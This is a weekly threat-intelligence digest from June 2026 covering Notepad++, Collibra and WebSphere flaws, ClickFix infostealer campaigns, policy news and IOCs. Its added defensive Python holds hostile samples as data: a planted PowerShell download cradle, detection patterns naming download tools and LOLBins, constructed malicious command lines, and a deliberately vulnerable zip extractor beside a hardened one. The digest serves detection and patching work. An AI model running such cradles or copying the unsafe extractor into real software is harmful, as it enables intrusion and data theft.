Cyber Threat Intelligence Digest: Week 22

3rd June 2026 - Threat Reports
  • Vulnerabilities
  • Potential Threats
  • General News
  • Threat Actor Weekly Graph
  • Global Trends Powered by Recorded Future
  • Prominent Information Security Events
  • Remediation Actions

Executive Summary -
Highlights of Cyber Threat Intelligence Digest

Vulnerabilities

Notepad++ Patches Three Vulnerabilities CVE-2026-48770, CVE-2026-48778, CVE-2026-48800 - On 26 May 2026, Notepad++ released version 8.9.6.1 to patch three vulnerabilities affecting the Windows editor in versions up to and including 8.9.6, with no reports of exploitation in the wild at the time of writing. CVE-2026-48770 is a moderate-severity denial-of-service flaw where a malformed inter-process communication message can crash the application within the same Windows session.

The remaining two are high-severity arbitrary code execution vulnerabilities. CVE-2026-48778 targets the configured command-line interpreter, allowing code execution when a user opens a containing folder in Command Prompt if the configuration has been tampered with. CVE-2026-48800 similarly exploits user-defined commands in shortcuts.xml, enabling code execution when a malicious Run menu entry is selected.
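Both code-execution flaws depend on a setting under the user's profile having been altered beforehand, so the practical check is an audit of that configuration rather than a patch alone. The Python below is an added example written for this digest, not code from the Notepad++ project or its advisory. It assumes the default shortcuts.xml layout (a UserDefinedCommands element holding Command elements whose text is the command line run from the Run menu) and that the command-line interpreter setting is a single command string; the sample file, including the planted download cradle, is constructed for the example.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample of a Notepad++ shortcuts.xml. Layout assumed from the editor's
# default file: <UserDefinedCommands> holds <Command name="..."> elements whose text
# is the command line run from the Run menu. The first two entries are stock defaults;
# the third is a planted download cradle of the kind the advisory warns about.
SAMPLE_SHORTCUTS_XML = """<?xml version="1.0" encoding="UTF-8" ?>
<NotepadPlus>
    <InternalCommands />
    <Macros />
    <UserDefinedCommands>
        <Command name="Launch in Firefox" Ctrl="yes" Alt="yes" Shift="yes" Key="88">firefox "$(FULL_CURRENT_PATH)"</Command>
        <Command name="Open in another instance" Ctrl="yes" Alt="yes" Shift="yes" Key="0">$(NPP_FULL_FILE_PATH) $(FULL_CURRENT_PATH)</Command>
        <Command name="Get PHP help" Ctrl="no" Alt="yes" Shift="no" Key="112">powershell -nop -w hidden -c "iex (iwr http://203.0.113.10/x.ps1)"</Command>
    </UserDefinedCommands>
</NotepadPlus>
"""

# Patterns that have no business in an editor shortcut, with the reason reported.
SUSPICIOUS = [
    (r"\b(iex|invoke-expression)\b", "PowerShell Invoke-Expression"),
    (r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget|certutil|bitsadmin)\b", "download cradle"),
    (r"\s-(e|ec|enc|encodedcommand)\s", "encoded PowerShell"),
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"\b(mshta|rundll32|regsvr32|wscript|cscript)\b", "script host / LOLBin"),
    (r"https?://", "remote URL"),
    (r"\\\\[^\\\s]+\\", "UNC path"),
]

def _reasons(text):
    return [label for pat, label in SUSPICIOUS if re.search(pat, text, re.IGNORECASE)]

def audit_user_commands(xml_text):
    """Return [(name, command, reasons)] for Run-menu entries that look planted."""
    root = ET.fromstring(xml_text)
    findings = []
    for cmd in root.iter("Command"):
        line = (cmd.text or "").strip()
        reasons = _reasons(line)
        if reasons:
            findings.append((cmd.get("name"), line, reasons))
    return findings

KNOWN_SHELLS = {"cmd", "cmd.exe", "powershell", "powershell.exe", "pwsh", "pwsh.exe"}
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files")

def audit_interpreter(value):
    """Reasons to distrust the configured command-line interpreter string.
    Assumption: the setting holds one command line whose first token is the shell."""
    value = value.strip()
    first = value.split()[0].strip('"') if value.split() else ""
    exe = first.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    reasons = _reasons(value)
    if exe not in KNOWN_SHELLS:
        reasons.append("unexpected interpreter: %s" % (exe or "<empty>"))
    if "\\" in first and not first.lower().startswith(TRUSTED_DIRS):
        reasons.append("interpreter path outside Windows/Program Files")
    return reasons
```

Run audit_user_commands over the shortcuts.xml in each user's AppData profile and audit_interpreter over the interpreter setting; a stock install yields no findings, so anything reported is worth a look before the user next touches the Run menu or "Open Containing Folder in cmd".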

CERT/CC Discloses CVE-2026-10621 and CVE-2026-10622 in Collibra Platform - On 2 June 2026, CERT/CC disclosed two vulnerabilities affecting the Collibra Agent component of the Collibra Platform, used in both SaaS and self-hosted deployments. Collibra had already released patches on 31 May 2026, and there are no reports of active exploitation at the time of writing.

CVE-2026-10621 is a path traversal vulnerability in the agent's restore functionality, where improper validation of file paths during ZIP extraction could allow an attacker to write arbitrary files outside the intended directory, potentially leading to remote code execution. CVE-2026-10622 is an improper authentication vulnerability caused by inadequate access controls on privileged REST API endpoints, allowing a threat actor to access privileged functionality without any authentication. Affected users should apply the available patches promptly.
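To make the bug class behind CVE-2026-10621 concrete, the Python below is an added example (not Collibra's code, and the archive layout is constructed for illustration). It places a restore routine that trusts archive entry names beside one that resolves every target and refuses anything outside the destination, and it validates the whole archive before writing a single file so a hostile backup leaves nothing behind.

```python
import io
import tempfile
import zipfile
from pathlib import Path

def build_zip(entries):
    """Build an in-memory archive from {name: content}; the restore input in this example."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()

# Constructed archives: a benign backup and one whose second entry climbs out of
# the restore directory. The layout is illustrative, not Collibra's backup format.
BENIGN_ZIP = build_zip({"backup/data.json": '{"ok": true}'})
HOSTILE_ZIP = build_zip({"backup/data.json": '{"ok": true}',
                         "../../escaped.txt": "written outside the restore directory"})

def extract_unsafe(zip_bytes, dest):
    """Vulnerable pattern: the entry name is joined to dest without checking the result."""
    dest = Path(dest)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = dest / info.filename          # "../.." is honoured here
            target.parent.mkdir(parents=True, exist_ok=True)
            if not info.is_dir():
                target.write_bytes(zf.read(info))

def confined_path(dest, name):
    """Resolve dest/name and require it to stay inside dest; raise otherwise."""
    if name.startswith(("/", "\\")) or (len(name) > 1 and name[1] == ":"):
        raise ValueError("absolute path in archive: %r" % name)
    candidate = (dest / name).resolve()
    if candidate != dest and dest not in candidate.parents:
        raise ValueError("path traversal in archive: %r" % name)
    return candidate

def extract_safe(zip_bytes, dest):
    """Hardened: validate every entry before writing anything, then write under dest only."""
    dest = Path(dest).resolve()
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        targets = [(info, confined_path(dest, info.filename)) for info in zf.infolist()]
        written = []
        for info, target in targets:
            if info.is_dir():
                target.mkdir(parents=True, exist_ok=True)
                continue
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(zf.read(info))
            written.append(target.relative_to(dest).as_posix())
    return written

def demo():
    """Run both extractors in a scratch directory and report what each let through."""
    root = Path(tempfile.mkdtemp()).resolve()
    extract_unsafe(HOSTILE_ZIP, root / "unsafe" / "restore")
    try:
        extract_safe(HOSTILE_ZIP, root / "safe" / "restore")
        blocked = False
    except ValueError:
        blocked = True
    return {
        "unsafe_escaped": (root / "escaped.txt").exists(),      # the entry landed two levels up
        "safe_blocked": blocked,                                # hostile entry rejected
        "safe_wrote_nothing": not (root / "safe" / "restore").exists(),
        "safe_benign": extract_safe(BENIGN_ZIP, root / "safe" / "restore"),
    }
```

The resolve-then-compare step is what closes the hole: it handles "..", absolute names and symlinked destinations in one place, whereas string checks for ".." alone are routinely bypassed. Two-pass validation matters as well, since an archive with the traversal entry last would otherwise be half-restored before the error.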

IBM Patches Critical WebSphere Application Server Vulnerabilities CVE-2026-8644, CVE-2026-9319, CVE-2026-9311 and CVE-2026-9330 - On 1 June 2026, IBM disclosed and released interim fixes for four vulnerabilities affecting IBM WebSphere Application Server traditional versions 8.5 and 9.0, with no evidence of active exploitation at the time of writing. The two most critical are CVE-2026-8644 (severity 9.1), an identity spoofing vulnerability caused by authentication bypass, and CVE-2026-9319 (severity 9.0), a remote code execution flaw affecting deployments using JAX-WS endpoints with WS-Security, exploitable by unauthenticated attackers via deserialization of untrusted data.

The remaining two are rated critical and high respectively. CVE-2026-9311 (severity 9.0) enables remote code execution through a bypass of security controls, whilst CVE-2026-9330 (severity 8.5) affects the SAML Web Single Sign-On component, where improper validation of user-supplied data during deserialization can be exploited via a crafted HTTP request combined with a suitable gadget chain. IBM recommends applying the interim fixes for the associated APARs now and moving to the fixed WebSphere Application Server fix packs when they are available.

Potential Threats

Threat Actors Impersonate Anthropic Claude Code Installation Process to Deploy Reflective .NET Infostealer and Steal Browser Credentials - On 28 May 2026, Cyderes reported a campaign in which threat actors used SEO poisoning to impersonate Anthropic's Claude Code installation process, targeting non-technical users such as small business owners and teachers seeking installation guidance. The campaign abused Anthropic's branding without compromising Anthropic itself, delivering a .NET infostealer designed to access browser-stored credentials and exfiltrate sensitive data.

The attack began with a ClickFix lure instructing victims to run a command via the Windows Run dialog, which retrieved a polyglot payload containing legitimate audio content alongside an embedded HTA script. The HTA created a scheduled task launching a 32-bit PowerShell instance, which bypassed AMSI, generated a victim-specific URL using an MD5 hash of the machine and username, and fetched a second-stage obfuscated PowerShell script executed entirely in memory. This script used Assembly.Load to reflectively load the .NET infostealer into the existing PowerShell process, exfiltrating browser credentials without ever writing the payload to disk.

DriverSurge Uses ClickFix and Fake Update Lures Across Compromised Websites - On 30 May 2026, Silent Push reported on a threat actor tracked as DriverSurge, which operates a large-scale malware distribution campaign across thousands of compromised websites. Silent Push assesses that DriverSurge likely functions as an Initial Access Broker operating on a Pay-Per-Install model, delivering malware and selling victim access to downstream threat actors, with eight distinct infrastructure fingerprints identified to track its operations.

The infection chain begins with malicious JavaScript injected into compromised sites, redirecting visitors through a traffic distribution system that profiles victims and determines the appropriate next-stage payload. Depending on the victim profile, DriverSurge serves either FakeUpdates pages impersonating popular browsers - including Chrome, Firefox, Edge, and others - distributing malware disguised as software updates, or ClickFix lures that instruct users to execute malicious PowerShell or terminal commands directly on their machines.

Threat Actors Distribute Fileless PureLogs Information Stealer in Phishing Campaign Targeting Windows Users - On 26 May 2026, Fortinet reported a phishing campaign distributing a fileless variant of the PureLogs information stealer targeting Windows users. Delivered via purchase-order-themed emails containing a RAR archive with an obfuscated JavaScript file, the malware is capable of harvesting a broad range of sensitive data including browser credentials, cookies, session tokens, screenshots, clipboard contents, cryptocurrency wallet data, Discord tokens, and credentials from applications such as Outlook, Thunderbird, FileZilla, and various VPN clients, before compressing, encrypting, and transmitting the collected data to command-and-control infrastructure.

The execution chain begins when the JavaScript decrypts and launches a hidden PowerShell script, which decodes and runs an in-memory payload. This payload performs process hollowing against a legitimate MsBuild.exe instance - creating a suspended process, replacing its memory with a malicious .NET module, and resuming execution. The injected module then runs a downloader within the hollowed process, which retrieves an encrypted plugin from the C2 server, decrypts and decompresses it entirely in memory, and executes the final fileless PureLogs payload without ever writing it to disk.
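Both the Claude Code and PureLogs chains hand off through a few parent/child relationships that endpoint telemetry records, so an added Python example (written for this digest, not taken from Cyderes or Fortinet) shows how to flag them over Sysmon-style process-creation and network events. The events, pids, paths, the RFC 5737 addresses and the base64 stub are constructed; the checks for a Run-dialog mshta fetch, a script host creating a scheduled task, the Task Scheduler launching a hidden 32-bit PowerShell, and a project-less MSBuild.exe that talks to the network are heuristics mirroring the reported behaviour, not published detection rules.

```python
import re

# Constructed Sysmon-style events (id 1 = process creation, id 3 = network connection).
EVENTS = [
    {"id": 1, "pid": 100, "ppid": 1, "image": "C:\\Windows\\explorer.exe", "cmd": "explorer.exe"},
    # Claude Code lure: Run dialog -> mshta pulls the audio/HTA polyglot, the HTA registers a task
    {"id": 1, "pid": 101, "ppid": 100, "image": "C:\\Windows\\System32\\mshta.exe",
     "cmd": "mshta http://203.0.113.5/guide/install.mp3"},
    {"id": 1, "pid": 102, "ppid": 101, "image": "C:\\Windows\\System32\\schtasks.exe",
     "cmd": "schtasks /create /tn Updater /sc minute /tr \"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -w hidden -ep bypass -f C:\\Users\\Public\\u.ps1\""},
    {"id": 1, "pid": 200, "ppid": 1, "image": "C:\\Windows\\System32\\svchost.exe",
     "cmd": "svchost.exe -k netsvcs -p -s Schedule"},
    {"id": 1, "pid": 201, "ppid": 200, "image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmd": "powershell.exe -w hidden -ep bypass -f C:\\Users\\Public\\u.ps1"},
    # PureLogs lure: archived JS -> hidden PowerShell -> MSBuild.exe with no project, then a beacon
    {"id": 1, "pid": 300, "ppid": 100, "image": "C:\\Windows\\System32\\wscript.exe",
     "cmd": "wscript.exe \"C:\\Users\\u\\Downloads\\PO-4471.js\""},
    {"id": 1, "pid": 301, "ppid": 300, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmd": "powershell.exe -w hidden -e SQBFAFgAIAA="},
    {"id": 1, "pid": 302, "ppid": 301, "image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe",
     "cmd": "MSBuild.exe"},
    {"id": 3, "pid": 302, "image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe",
     "dst": "198.51.100.7", "dport": 443},
    # Benign control: a developer building a project from a console
    {"id": 1, "pid": 400, "ppid": 100, "image": "C:\\Windows\\System32\\cmd.exe", "cmd": "cmd.exe"},
    {"id": 1, "pid": 401, "ppid": 400, "image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe",
     "cmd": "MSBuild.exe app.csproj /t:Build"},
]

def base(image):
    return image.rsplit("\\", 1)[-1].lower()

def ancestry(procs, pid, depth=6):
    """[self, parent, grandparent, ...] by image name, as far as the events allow."""
    chain = []
    while pid in procs and depth > 0:
        chain.append(base(procs[pid]["image"]))
        pid, depth = procs[pid]["ppid"], depth - 1
    return chain

HIDDEN = re.compile(r"-w(indowstyle)?\s+h", re.I)
PROJECT = re.compile(r"\.(proj|csproj|vbproj|sln)\b|[/-]t:", re.I)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}

def detect(events):
    """Return [(pid, reason)] for processes matching the reported chains."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    talkers = {e["pid"] for e in events if e["id"] == 3}
    findings = []
    for pid, p in procs.items():
        img, cmd, chain = base(p["image"]), p["cmd"], ancestry(procs, pid)
        parent = chain[1] if len(chain) > 1 else ""
        parent_cmd = procs.get(p["ppid"], {}).get("cmd", "").lower()
        if img == "mshta.exe" and parent == "explorer.exe" and re.search(r"https?://", cmd, re.I):
            findings.append((pid, "Run-dialog mshta fetching a remote payload (ClickFix)"))
        if img == "schtasks.exe" and "/create" in cmd.lower() and parent in SCRIPT_HOSTS:
            findings.append((pid, "scheduled task created by a script host"))
        if (img == "powershell.exe" and "\\syswow64\\" in p["image"].lower()
                and HIDDEN.search(cmd) and "schedule" in parent_cmd):
            findings.append((pid, "hidden 32-bit PowerShell started by the Task Scheduler"))
        if img == "msbuild.exe" and not PROJECT.search(cmd):
            if parent == "powershell.exe":
                findings.append((pid, "MSBuild.exe without a project file spawned by PowerShell (hollowing host?)"))
            if pid in talkers:
                findings.append((pid, "MSBuild.exe without a project file making a network connection"))
    return findings
```

Two of these rules earn their keep on their own: a 32-bit PowerShell started by the scheduler on a 64-bit host is rare outside malware, and a hollowed MSBuild.exe inherits an innocuous image path but was started with no project to build and then opens a socket, which no legitimate build does. The developer's build in the sample trips neither.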

General News

White House unveils pared-back AI executive order - The White House released a revised AI executive order after an initial version was scrapped last month following internal dissent, most notably from former AI and crypto czar David Sacks, who raised concerns about harm to innovation and competitiveness with China. The key change is a reduction in the voluntary government review period for AI models from 90 days to 30 days post-release, a compromise after industry had pushed for just 14 days. The order was signed behind closed doors and explicitly states the voluntary framework should not be interpreted as authorising any mandatory licensing or permitting requirements for AI development.

On cybersecurity, the order directs industry and government to collaborate on designating "covered frontier" models accessible to trusted partners for critical infrastructure protection and classified cyber threat tracking, alongside the creation of a Treasury-led AI cybersecurity clearinghouse. It also tasks CISA, the Office of the National Cyber Director, and the Office of Management and Budget with identifying federal grant funding for AI vulnerability detection. Senate Intelligence Committee Chairman Mark Warner broadly endorsed the measures, whilst noting that several provisions echoed those in the Biden-era AI executive order that was rescinded on the first day of the current administration.

Microsoft says it will not pursue security researchers after zero-day backlash - Microsoft clarified it has "no intention to pursue action" against security researchers who publish vulnerability findings, days after an official blog post sparked significant backlash. The original post had condemned a series of uncoordinated Windows zero-day releases by pseudonymous researcher Nightmare Eclipse as "never justifiable," with language widely perceived as threatening. The security community rallied around the researcher, who alleged Microsoft had deleted their MSRC account, withheld bounty payments, and removed their attribution from at least one advisory - allegations Microsoft did not directly address in its follow-up statement.

The new statement, shared via social media rather than Microsoft's official blog, acknowledged that "some interactions have fallen short" and notably dropped the phrase "responsible disclosure" in favour of "Coordinated Vulnerability Disclosure," a term Microsoft itself adopted in 2010 to avoid implying that non-compliant researchers are behaving irresponsibly. Security professional Katie Moussouris, who helped retire the earlier term whilst at Microsoft, had flagged its reappearance as deliberately loaded. Meanwhile, Nightmare Eclipse announced that following recent events other researchers had begun sharing vulnerabilities with them directly, and that a new Secure Boot vulnerability - reportedly capable of fully bypassing BitLocker and potentially compromising confidential virtual machines - would be released sometime in June.

Russia conducting daily attacks on UK 'from seabed to cyberspace,' spy chief warns - The head of GCHQ, Anne Keast-Butler, used a speech at Bletchley Park to deliver a stark warning that Russia is conducting daily hybrid attacks against the UK and Europe, targeting critical infrastructure, democratic processes, supply chains and public trust across everything from undersea cables to corporate networks. She called on businesses and government to treat cybersecurity with ten times greater urgency, noting that the risk of miscalculation is "as high as I have ever seen it." Countermeasures already underway include defending subsea cables, disrupting Russian sanctions-busting networks, and - disclosed last month - tracking and forcing the retreat of a Russian submarine operation near critical seabed infrastructure.

Keast-Butler also highlighted the growing threat posed by China, which she described as a science and technology superpower with sophisticated cyber and military capabilities, echoing recent Dutch military intelligence assessments. On AI, she announced plans for a new national cyber defence capability embedding agentic AI into systems able to detect and respond to attacks faster than human operators, to be delivered by the National Cyber Security Centre. She further warned that quantum computing will eventually break traditional encryption protecting government, financial, and military systems - including those relating to Britain's nuclear deterrent - and urged businesses to begin transitioning to quantum-resistant systems now.

Threat Actor Weekly Graph

Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.

Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.

Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.

Both intent and opportunity are scored out of 100 and are responsible for scoring the group's severity. These updates can be seen below.


Severity scale: Limited, Basic, Moderate, High

Threat Actor         Severity   Increase   Opportunity   Intent
RedGolf              High       High       82 / 80       25 / 25
Dragon Force Group   Moderate   Moderate   57 / 54       49 / 49
get_com              Basic      NEW        NEW / 30      NEW / 25
hyflock              Basic      NEW        NEW / 25      NEW / 30
basrol               Basic      NEW        NEW / 30      NEW / 5

Global Trends Powered by Recorded Future

Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.

The spikes in references are calculated over 60 days and are normalised to ensure they aren't disproportionate when compared to bigger entities that will naturally have more baseline mentions.

- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.

Attackers                       Methods              Vulnerabilities   Targets
SideCopy                        Xeno RAT             CVE-2025-48595    Meta
KillSecurity Ransomware Group   Anubis Ransomware    CVE-2026-41091    Central Board of Secondary Education
DimasHxR                        LockBit Ransomware   CVE-2024-21182    CJ Group
GREYVIBE                        3AM Ransomware       CVE-2026-41089    TVing
Lapsus$ Group                   Adware               CVE-2026-8206     Dashlane

Prominent Information Security Events

Threat Actors Impersonate Anthropic Claude Code Installation Process to Deploy Reflective .NET Infostealer and Steal Browser Credentials

Source: Insikt Group | Validated Intelligence Event

IOC: Domain - oakenfjrod[.]ru

IOC: IP - 185[.]177[.]239[.]255

On 28 May 2026, Cyderes reported a campaign in which threat actors used SEO poisoning to impersonate Anthropic's Claude Code installation process, deliberately targeting non-technical users such as small business owners, entrepreneurs, and teachers who were searching for installation guidance. By manipulating search engine results to surface malicious pages mimicking legitimate Anthropic content, the attackers were able to reach victims at the precise moment they were most likely to follow installation instructions without scrutiny. Cyderes confirmed that Anthropic itself was not compromised - the campaign was an abuse of Anthropic's branding and installation workflow rather than a breach of its systems.

The attack was initiated via a ClickFix lure, which instructed victims to execute a command through the Windows Run dialog. That command retrieved a polyglot payload cleverly disguised by bundling legitimate audio content alongside an embedded HTA script, helping it evade casual inspection. The HTA then created a scheduled task on the victim's machine, which launched a 32-bit PowerShell instance configured to operate silently in the background.

From there, PowerShell bypassed the Antimalware Scan Interface (AMSI) and generated a victim-specific URL derived from an MD5 hash of the computer and username, adding a degree of targeting and obfuscation to the infrastructure. A second-stage obfuscated PowerShell script was retrieved and executed entirely in memory, using Assembly.Load to reflectively load a .NET infostealer into the existing PowerShell process. The final payload harvested browser-stored credentials and other sensitive data before exfiltrating it - all without ever writing the malicious payload to disk, making detection and forensic recovery significantly more difficult.
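The polyglot at the front of this chain works because mshta.exe runs whatever markup it finds regardless of the file's extension or leading bytes, while a cursory look at the download shows a valid audio header. The Python below is an added example for this digest (not Cyderes' tooling and not the campaign's file) that scans a blob for an audio signature followed by HTA markup; the samples, including the inert HTA skeleton, are constructed.

```python
import re

# Magic bytes for common audio containers; the polyglot keeps one so casual tools
# (and the download's file extension) treat the file as audio.
AUDIO_MAGIC = [(b"ID3", "MP3 (ID3v2 tag)"), (b"\xff\xfb", "MP3 frame"), (b"RIFF", "WAV"),
               (b"OggS", "Ogg"), (b"fLaC", "FLAC")]

# Markers that have no place inside audio data but that an HTA needs in order to run.
SCRIPT_MARKERS = [rb"<hta:application", rb"<script\b", rb"<html\b", rb"\bActiveXObject\b",
                  rb"\bCreateObject\b", rb"WScript\.Shell", rb"\bschtasks\b", rb"\bpowershell\b"]

def audio_type(data):
    for magic, name in AUDIO_MAGIC:
        if data.startswith(magic):
            if name == "WAV" and data[8:12] != b"WAVE":
                continue
            return name
    return None

def scan_polyglot(data):
    """Classify bytes as clean audio, a bare script, or an audio/HTA polyglot."""
    kind = audio_type(data)
    hits = sorted((m.start(), m.group().decode("latin-1"))
                  for pat in SCRIPT_MARKERS for m in re.finditer(pat, data, re.IGNORECASE))
    if kind and hits:
        verdict = "audio/HTA polyglot"
    elif hits:
        verdict = "script"
    else:
        verdict = "clean"
    return {"audio": kind, "first_marker_offset": hits[0][0] if hits else None,
            "markers": [m for _, m in hits], "verdict": verdict}

# Constructed samples: an ID3v2 header and filler standing in for MP3 frames, with and
# without an HTA body appended. The HTA body is an inert skeleton, not the campaign's.
FAKE_AUDIO = b"ID3\x03\x00\x00\x00\x00\x10\x00" + bytes(range(256)) * 8
HTA_BODY = (b"<html><head><hta:application id='x' showintaskbar='no'/></head>"
            b"<script language='VBScript'>Set s = CreateObject(\"WScript.Shell\")"
            b": s.Run \"schtasks /query\", 0</script></html>")
CLEAN_SAMPLE = FAKE_AUDIO
POLYGLOT_SAMPLE = FAKE_AUDIO + HTA_BODY
```

Run scan_polyglot over proxy-cached downloads whose content type or extension claims audio; a hit reports the offset where the markup starts, which is also where the audio data stops being audio. The check is deliberately content-based because neither the extension nor the Content-Type header is trustworthy here.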

DriverSurge Uses ClickFix and Fake Update Lures Across Compromised Websites

Source: Insikt Group | Validated Intelligence Event

IOC: Domain: captioto[.]com

IOC: Hash: 90aecb370dfb1a99a1f7de0a9c6842ab1b664521fddea16b0ec9a91f322646fc

On 30 May 2026, Silent Push reported on a threat actor it tracks as DriverSurge, which operates a large-scale malware distribution campaign across thousands of compromised websites. Silent Push assesses that DriverSurge likely functions as an Initial Access Broker operating on a Pay-Per-Install model, meaning it earns revenue by delivering malware payloads and selling access to compromised victim machines to downstream threat actors. Eight distinct infrastructure fingerprints have been identified to assist in tracking the group's operations, underlining the scale and consistency of its infrastructure.

The infection chain begins when DriverSurge injects malicious JavaScript into compromised websites, silently redirecting visitors through a traffic distribution system known as zTDS. This system profiles each visitor - likely assessing factors such as browser type, location, and device - before determining which next-stage payload to serve, allowing the campaign to tailor its approach to maximise the likelihood of successful infection.

Depending on the victim profile, DriverSurge then presents one of two social engineering techniques. The first is FakeUpdates pages that convincingly impersonate update prompts for a wide range of popular browsers including Chrome, Firefox, Edge, Safari, Opera, Brave, and others, tricking users into downloading malware disguised as a legitimate software update. The second is ClickFix lures, which present fake verification or error messages instructing the victim to paste a malicious command directly into PowerShell or Terminal. Both methods rely on deceiving users into taking an action that initiates the infection themselves, reducing the need for the attacker to exploit any technical vulnerability.
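For site owners the earliest visible artefact is the injected loader itself, before any TDS redirect or lure is served. The Python below is an added example for this digest (not Silent Push's fingerprints or tooling) that scans a page's script tags for loads from hosts the site does not use, inline scripts built to hide their destination, and the refanged IOC domain from the list above. The sample page and the fictional shop host are constructed.

```python
import re
from urllib.parse import urlsplit

def refang(ioc):
    """Turn a defanged indicator such as captioto[.]com into a matchable host name."""
    return ioc.replace("[.]", ".").replace("hxxp", "http").lower()

# Host names from this digest's IOC list, kept defanged in source and refanged at load.
KNOWN_BAD = {refang("captioto[.]com")}

# Traits of injected loaders: fetched from a host the site does not use, or inline
# and written to hide where it sends the visitor.
OBFUSCATION = [r"\beval\s*\(", r"\batob\s*\(", r"String\.fromCharCode", r"\bunescape\s*\(",
               r"document\.write\s*\(", r"(?:\\x[0-9a-f]{2}){8,}"]
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)

def host_of(url):
    if url.startswith("//"):
        url = "https:" + url
    return (urlsplit(url).hostname or "").lower()

def scan_page(html, site_host, allowed_hosts=()):
    """Return [(reason, detail)] for script tags a page owner should not expect."""
    allowed = {site_host.lower(), *(h.lower() for h in allowed_hosts)}
    findings = []
    for attrs, body in SCRIPT_RE.findall(html):
        src = SRC_RE.search(attrs)
        if src:
            host = host_of(src.group(1))
            if host in KNOWN_BAD:
                findings.append(("script from known TDS/IOC host", src.group(1)))
            elif host and host not in allowed:
                findings.append(("script from unexpected host", src.group(1)))
            continue
        if any(bad in body.lower() for bad in KNOWN_BAD):
            findings.append(("inline reference to known TDS/IOC host", body.strip()[:60]))
        elif any(re.search(p, body, re.I) for p in OBFUSCATION):
            findings.append(("obfuscated inline script", body.strip()[:60]))
    return findings

# Constructed page for a fictional shop: two expected scripts and a benign inline
# snippet, followed by three injected tags.
SAMPLE_PAGE = """<html><head>
<script src="/assets/app.js"></script>
<script src="https://code.jquery.com/jquery-3.7.1.min.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script src="https://%s/js/loader.js"></script>
<script src="//cdn-static-update.example/fu.js"></script>
<script>eval(atob("dmFyIGE9MTs="));</script>
</head><body>Shop</body></html>""" % refang("captioto[.]com")
```

The allow-list of script hosts is the part that needs maintaining per site; once it is accurate, any new third-party src is a change worth explaining, which is exactly the signal a mass-injection campaign produces across thousands of otherwise unrelated sites.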

Remediation Actions

Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:

  • CVE-2026-48770, CVE-2026-48778, CVE-2026-48800 (Notepad++) – These vulnerabilities can be remediated by updating to version 8.9.6.1.

  • CVE-2026-10621, CVE-2026-10622 (Collibra) – Collibra released two patches on 31 May 2026 to fix these vulnerabilities.

  • CVE-2026-8644, CVE-2026-9319, CVE-2026-9311, CVE-2026-9330 (IBM WebSphere) – IBM has released interim fixes for each of these vulnerabilities and recommends applying them as soon as possible.

If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.